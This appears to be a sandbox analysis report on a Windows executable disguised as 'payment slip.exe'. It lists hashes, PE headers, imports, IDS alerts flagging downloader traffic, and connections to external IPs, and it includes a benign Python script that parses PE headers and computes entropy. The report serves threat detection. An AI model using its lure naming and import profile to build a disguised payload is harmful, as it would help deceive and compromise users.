File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.885746394009194
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: payment slip.exe
File size: 1'065'472 bytes
MD5: 0cac6a293391fdb0f89189a89dc47150
SHA1: 080ab6bad708ce618e411d2f1aab56cd24b058ba
SHA256: 51b79481d9e411146f4d43f1c3028b71c020ebd3ebb2e0eaeddc03a7ca0c1106
SHA512: e38ad11754d30d19b1164df37815c309be726a4a5cc162d2082fdcb32e47ef8bdb4e8bf71a742a73c8b20c7f8399657b5d68ee71f8cf77f92c1fb0932f7bae5e
SSDEEP: 24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aGw7eg:7TvC/MTQYxsWR7aGw7
TLSH: CE35BF0273D1C062FF9B92334B5AF6115BBC69260123E61F13981DBABE705B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66A97D6E [Tue Jul 30 23:55:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
                                      Instruction
                                      call 00007F6D847B9063h
                                      jmp 00007F6D847B896Fh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F6D847B8B4Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F6D847B8B1Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
                                      call 00007F6D847BB70Dh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007F6D847BB758h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007F6D847BB741h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x2d6d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x2d6d4 | 0x2d800 | 4470ababa5eff70068a07ac37aa9ab85 | False | 0.8550287603021978 | data | 7.706643227579641 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x102000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
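The header and section values tabulated above are read directly from the PE structures in the file. As an added example (not Joe Sandbox code), the Python below parses a PE32 image, decodes the timestamp, entrypoint, subsystem, file and DLL characteristics, and computes the per-section 8-bit Shannon entropy that the Entropy column reports. Its input is a two-section PE constructed inside the script so it runs offline; the header fields are set to the values listed on this page (timestamp 0x66A97D6E, image base 0x400000, entrypoint RVA 0x20577, characteristics 0x0122 and 0x8040) so the decoded output can be compared against the report, but it is not the analysed sample and its section contents are synthetic.

```python
"""Decode the PE header fields a sandbox report summarises (timestamp, entrypoint,
image base, subsystem, file and DLL characteristics, sections) and compute the
8-bit Shannon entropy per section. Added example, not Joe Sandbox code. The PE
bytes are constructed below so the script runs offline; they are not the sample."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _flags(value: int, table: dict) -> list:
    """Names of the set bits, in ascending bit order (the order the report prints them)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32(blob: bytes) -> dict:
    """Return the header fields a triage report lists, plus per-section entropy (PE32 only)."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    _machine, nsections, stamp, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER32 follows the file header
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", blob, opt + 68)
    sections = []
    for i in range(nsections):               # IMAGE_SECTION_HEADER entries follow the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize, "raw_size": rawsize,
                         "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize])})
    return {"timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc),
            "entrypoint": image_base + entry_rva, "image_base": image_base,
            "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
            "file_characteristics": _flags(file_chars, FILE_CHARACTERISTICS),
            "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
            "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 (not the analysed binary). Header values are set to the
    ones the report lists so the decoded output can be compared against it: timestamp
    0x66A97D6E, entrypoint RVA 0x20577 on image base 0x400000, characteristics 0x0122,
    DllCharacteristics 0x8040. Section bytes are chosen to hit both entropy extremes."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at offset 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x66A97D6E, 0, 0, 224, 0x0122)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 9, 0, 0x10, 0x100, 0, 0x20577, 0x1000, 0x2000, 0x400000)
    opt += struct.pack("<IIHHHHHHIIIIHH", 0x1000, 0x200, 5, 1, 0, 0, 5, 1, 0, 0x3000, 0x200, 0, 2, 0x8040)
    opt = opt.ljust(224, b"\0")                                     # remaining fields and data directories zero
    text = b"\x90" * 16                                             # constant bytes: entropy 0.0
    rsrc = bytes(range(256))                                        # every byte value once: entropy 8.0
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), 0x2000, len(rsrc), 0x400, 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0")
    return headers + text.ljust(0x200, b"\0") + rsrc


if __name__ == "__main__":
    info = parse_pe32(build_sample_pe())
    print(f"Time Stamp: {info['timestamp']:%a %b %d %H:%M:%S %Y UTC}  Entrypoint: {info['entrypoint']:#x}")
    print("Image File Characteristics:", ", ".join(info["file_characteristics"]))
    print("DLL Characteristics:", ", ".join(info["dll_characteristics"]))
    for s in info["sections"]:
        print(f"{s['name']:<8} VA {s['virtual_address']:#x} raw {s['raw_size']:#x} entropy {s['entropy']:.3f}")
```

Entropy is computed over the raw bytes of each section, which is why a section's Entropy column can differ sharply from the whole-file value: a .rsrc section near 7.7, as in the table above, is what compressed or encrypted embedded content looks like, while .data near 0.6 is mostly zero-initialised storage. The value says nothing about what the content is, so it has to be read alongside the resource and dropped-file tables.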
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x2499c | data | - | - | 1.000373542517143
RT_GROUP_ICON | 0x101154 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1011cc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1011e0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1011f4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x101208 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1012e4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL: Import
WSOCK32.dll: gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll: GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll: HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll: DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats,
CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-31T09:00:33.864966+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49705 | 80 | 192.168.2.7 | 132.226.247.73
2024-07-31T09:00:33.118074+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49704 | 443 | 192.168.2.7 | 188.114.96.3
2024-07-31T09:00:40.378056+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49712 | 443 | 192.168.2.7 | 188.114.96.3
2024-07-31T09:00:44.027841+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49716 | 443 | 192.168.2.7 | 188.114.96.3
2024-07-31T09:00:37.056967+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49710 | 443 | 192.168.2.7 | 188.114.96.3
2024-07-31T09:00:45.364061+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49719 | 443 | 192.168.2.7 | 188.114.96.3
2024-07-31T09:00:32.568020+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49702 | 80 | 192.168.2.7 | 132.226.247.73
2024-07-31T09:00:31.588618+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 31, 2024 09:00:29.338669062 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:29.344324112 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:29.344419956 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:29.344671011 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:29.352587938 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:30.024816990 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:30.030251980 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:30.036159039 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:31.588428020 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:31.588527918 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:31.588618040 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:31.645220041 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:31.645289898 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:31.645384073 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:31.655020952 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:31.655056953 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.142241001 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.142453909 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.147922993 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.147938013 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.148422956 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.193027020 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.196141005 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.236543894 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.305496931 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.305731058 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.305824995 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.312180042 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
